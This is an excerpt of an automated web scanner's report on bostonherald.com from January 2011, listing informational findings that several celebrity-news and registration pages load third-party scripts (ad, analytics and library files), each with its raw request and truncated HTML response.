Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:39:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.768. http://www.bostonherald.com/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:41:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.769. http://www.bostonherald.com/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=recent_bullet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=recent_bullet

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=recent_bullet HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:42:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.770. http://www.bostonherald.com/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:38:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.771. http://www.bostonherald.com/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=recent_bullet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=recent_bullet

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=recent_bullet HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:38:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.772. http://www.bostonherald.com/track/star_tracks/view/20110128seiji_ozawa_has_back_surgery/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/view/20110128seiji_ozawa_has_back_surgery/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/view/20110128seiji_ozawa_has_back_surgery/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:39:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.773. http://www.bostonherald.com/track/star_tracks/view/20110128startracks/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/view/20110128startracks/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/view/20110128startracks/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:37:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.774. http://www.bostonherald.com/track/track_gals_tv/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/track_gals_tv/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/track_gals_tv/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:37:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.775. http://www.bostonherald.com/users/register

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/register HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
